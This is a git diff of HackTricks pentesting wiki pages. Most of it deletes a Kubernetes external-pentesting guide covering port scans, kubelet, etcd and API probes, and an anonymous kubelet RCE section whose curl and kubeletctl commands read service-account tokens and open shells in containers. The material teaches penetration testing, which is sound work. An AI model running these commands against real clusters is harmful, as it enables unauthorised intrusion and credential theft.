ClusterRoleBinding -metadata: - name: read-secrets-global -subjects: -- kind: Group - name: manager # Name is case sensitive - apiGroup: rbac.authorization.k8s.io -roleRef: - kind: ClusterRole - name: secret-reader - apiGroup: rbac.authorization.k8s.io -``` -{% endcode %} - -**Permissions are additive** so if you have a clusterRole with β€œlist” and β€œdelete” secrets you can add it with a Role with β€œget”. So be aware and test always your roles and permissions and **specify what is ALLOWED, because everything is DENIED by default.** - -# **Enumerating RBAC** - -```bash -# Get current privileges -kubectl auth can-i --list -# use `--as=system:serviceaccount::` to impersonate a service account - -# List Cluster Roles -kubectl get clusterroles -kubectl describe clusterroles - -# List Cluster Roles Bindings -kubectl get clusterrolebindings -kubectl describe clusterrolebindings - -# List Roles -kubectl get roles -kubectl describe roles - -# List Roles Bindings -kubectl get rolebindings -kubectl describe rolebindings -``` - -## Abuse Role/ClusterRoles for Privilege Escalation - -{% content-ref url="../../cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/" %} -[abusing-roles-clusterroles-in-kubernetes](../../cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/) -{% endcontent-ref %} - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md b/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md deleted file mode 100644 index fa39f6bc4..000000000 --- a/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md +++ /dev/null @@ -1,240 +0,0 @@ -# Pentesting Kubernetes Services - -Kubernetes uses several **specific network services** that you might find **exposed to the Internet** or in an **internal network once you have compromised one pod**. - -## Finding exposed pods with OSINT - -One way could be searching for `Identity LIKE "k8s.%.com"` in [crt.sh](https://crt.sh) to find subdomains related to kubernetes. Another way might be to search `"k8s.%.com"` in github and search for **YAML files** containing the string. - -## How Kubernetes Exposes Services - -It might be useful for you to understand how Kubernetes can **expose services publicly** in order to find them: - -{% content-ref url="exposing-services-in-kubernetes.md" %} -[exposing-services-in-kubernetes.md](exposing-services-in-kubernetes.md) -{% endcontent-ref %} - -## Finding Exposed pods via port scanning - -The following ports might be open in a Kubernetes cluster: - -| Port | Process | Description | -| --------------- | -------------- | ---------------------------------------------------------------------- | -| 443/TCP | kube-apiserver | Kubernetes API port | -| 2379/TCP | etcd | | -| 6666/TCP | etcd | etcd | -| 4194/TCP | cAdvisor | Container metrics | -| 6443/TCP | kube-apiserver | Kubernetes API port | -| 8443/TCP | kube-apiserver | Minikube API port | -| 8080/TCP | kube-apiserver | Insecure API port | -| 10250/TCP | kubelet | HTTPS API which allows full mode access | -| 10255/TCP | kubelet | Unauthenticated read-only HTTP port: pods, running pods and node state | -| 10256/TCP | kube-proxy | Kube Proxy health check server | -| 9099/TCP | calico-felix | Health check server for Calico | -| 6782-4/TCP | weave | Metrics and endpoints | -| 30000-32767/TCP | NodePort | Proxy to the services | -| 44134/TCP | Tiller | Helm service listening | - -### Nmap - -``` -nmap -n -T4 -p 443,2379,6666,4194,6443,8443,8080,10250,10255,10256,9099,6782-6784,30000-32767,44134 /16 -``` - -### Kube-apiserver - -This is the **API Kubernetes service** the administrators talks with usually using the tool **`kubectl`**. - -**Common ports: 6443 and 443**, but also 8443 in minikube and 8080 as insecure. - -``` -curl -k https://:(8|6)443/swaggerapi -curl -k https://:(8|6)443/healthz -curl -k https://:(8|6)443/api/v1 -``` - -**Check the following page to learn how to obtain sensitive data and perform sensitive actions talking to this service:** - -{% content-ref url="../../cloud-security/pentesting-kubernetes/kubernetes-enumeration.md" %} -[kubernetes-enumeration.md](../../cloud-security/pentesting-kubernetes/kubernetes-enumeration.md) -{% endcontent-ref %} - -### Kubelet API - -This service **run in every node of the cluster**. It's the service that will **control** the pods inside the **node**. It talks with the **kube-apiserver**. - -If you find this service exposed you might have found an [**unauthenticated RCE**](pentesting-kubernetes-from-the-outside.md#kubelet-rce). - -#### Kubelet API - -``` -curl -k https://:10250/metrics -curl -k https://:10250/pods -curl -k https://:10250/runningpods/ -``` - -If the response is `Unauthorized` then it requires authentication. - -If you can list nodes you can get a list of kubelets endpoints with: - -```bash -kubectl get nodes -o custom-columns='IP:.status.addresses[0].address,KUBELET_PORT:.status.daemonEndpoints.kubeletEndpoint.Port' | grep -v KUBELET_PORT | while IFS='' read -r node; do - ip=$(echo $node | awk '{print $1}') - port=$(echo $node | awk '{print $2}') - echo "curl -k --max-time 30 https://$ip:$port/pods" - echo "curl -k --max-time 30 https://$ip:2379/version" #Check also for etcd -done -``` - -#### kubelet (Read only) - -``` -curl -k https://:10255 -http://:10255/pods -``` - -### etcd API - -``` -curl -k https://:2379 -curl -k https://:2379/version -etcdctl --endpoints=http://:2379 get / --prefix --keys-only -``` - -### Tiller - -``` -helm --host tiller-deploy.kube-system:44134 version -``` - -You could abuse this service to escalate privileges inside Kubernetes: - -{% content-ref url="../../network-services-pentesting/44134-pentesting-tiller-helm.md" %} -[44134-pentesting-tiller-helm.md](../../network-services-pentesting/44134-pentesting-tiller-helm.md) -{% endcontent-ref %} - -### cAdvisor - -Service useful to gather metrics. - -``` -curl -k https://:4194 -``` - -### NodePort - -When a port is exposed in all the nodes via a **NodePort**, the same port is opened in all the nodes proxifying the traffic into the declared **Service**. By default this port will be in in the **range 30000-32767**. So new unchecked services might be accessible through those ports. - -``` -sudo nmap -sS -p 30000-32767 -``` - -## Vulnerable Misconfigurations - -### Kube-apiserver Anonymous Access - -By **default**, **kube-apiserver** API endpoints are **forbidden** to **anonymous** access. But it’s always a good idea to check if there are any **insecure endpoints that expose sensitive information**: - -![](https://www.cyberark.com/wp-content/uploads/2019/09/Kube-Pen-2-fig-5.png) - -### **Checking for ETCD Anonymous Access** - -The ETCD stores the cluster secrets, configuration files and more **sensitive data**. By **default**, the ETCD **cannot** be accessed **anonymously**, but it always good to check. - -If the ETCD can be accessed anonymously, you may need to **use the** [**etcdctl**](https://github.com/etcd-io/etcd/blob/master/etcdctl/READMEv2.md) **tool**. The following command will get all the keys stored: - -``` -etcdctl --endpoints=http://:2379 get / --prefix --keys-only -``` - -### **Kubelet RCE** - -The [**Kubelet documentation**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/) explains that by **default anonymous acce**ss to the service is **allowed:** - -![](<../../.gitbook/assets/image (637) (1) (1) (1).png>) - -The **Kubelet** service **API is not documented**, but the source code can be found here and finding the exposed endpoints is as easy as **running**: - -```bash -curl -s https://raw.githubusercontent.com/kubernetes/kubernetes/master/pkg/kubelet/server/server.go | grep 'Path("/' - -Path("/pods"). -Path("/run") -Path("/exec") -Path("/attach") -Path("/portForward") -Path("/containerLogs") -Path("/runningpods/"). -``` - -All of them sounds interesting. - -#### /pods - -This endpoint list pods and their containers: - -```bash -curl -ks https://worker:10250/pods -``` - -#### /exec & /run - -This endpoint allows to execute code inside any container very easily: - -```bash -# You can get all the namespaces, pods and containers running with: -curl -k https://10.10.11.133:10250/pods | jq -r '.items[] | [.metadata.namespace, .metadata.name, [.spec.containers[].name]]' -curl -k https://10.10.11.133:10250/runningpods/ | jq -r '.items[] | [.metadata.namespace, .metadata.name, [.spec.containers[].name]]' - -# /run -curl -XPOST -k https://10.10.11.133:10250/run/{namespace}/{pod}/{container} \ - -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt /var/run/secrets/kubernetes.io/serviceaccount/token" - -# /exec -# The command is passed as an array (split by spaces) and that is a GET request. -curl -sk -X POST -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" \ - https://worker:10250/exec/{namespace}/{pod}/{container} \ - -d 'input=1' -d 'output=1' -d 'tty=1' \ - -d 'command=ls' -d 'command=/' - -# Using kubeletctl -## get kubeletctl from releases in https://github.com/cyberark/kubeletctl -kubeletctl exec /bin/sh -n -p -c -s --cacert ./ca.crt -kubeletctl exec /bin/sh -p kube-proxy-84qt4 -c kube-proxy -n kube-system -s 10.129.227.136 --cacert ./ca.crt -``` - -To automate the exploitation you can also use the script [**kubelet-anon-rce**](https://github.com/serain/kubelet-anon-rce). - -{% hint style="info" %} -To avoid this attack the _**kubelet**_ service should be run with `--anonymous-auth false` and the service should be segregated at the network level. -{% endhint %} - -### **Checking Kubelet (Read Only Port) Information Exposure** - -When the **kubelet read-only port** is exposed, the attacker can retrieve information from the API. This exposes **cluster configuration elements, such as pods names, location of internal files and other configurations**. This is not critical information, but it still should not be exposed to the internet. - -For example, a remote attacker can abuse this by accessing the following URL: `http://:10255/pods` - -![](https://www.cyberark.com/wp-content/uploads/2019/09/KUbe-Pen-2-fig-6.png) - -## References - -{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-2" %} - -{% embed url="https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet" %} - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md index 019038ec7..14ed19a3e 100644 --- a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md +++ b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md @@ -473,7 +473,7 @@ In this case, `John@corp.local` has `GenericWrite` over `Jane@corp.local`, and w First, we obtain the hash of `Jane` with for instance Shadow Credentials (using our `GenericWrite`). -
+
Next, we change the `userPrincipalName` of `Jane` to be `Administrator`. Notice that we’re leaving out the `@corp.local` part. @@ -522,7 +522,7 @@ In this case, `John@corp.local` has `GenericWrite` over `Jane@corp.local`, and w First, we obtain the hash of `Jane` with for instance Shadow Credentials (using our `GenericWrite`). -
+
Next, we change the `userPrincipalName` of `Jane` to be `Administrator`. Notice that we’re leaving out the `@corp.local` part. @@ -553,7 +553,7 @@ In this case, `John@corp.local` has `GenericWrite` over `Jane@corp.local`, and w First, we obtain the hash of `Jane` with for instance Shadow Credentials (using our `GenericWrite`). -
+
Next, we change the `userPrincipalName` of `Jane` to be `DC$@corp.local`.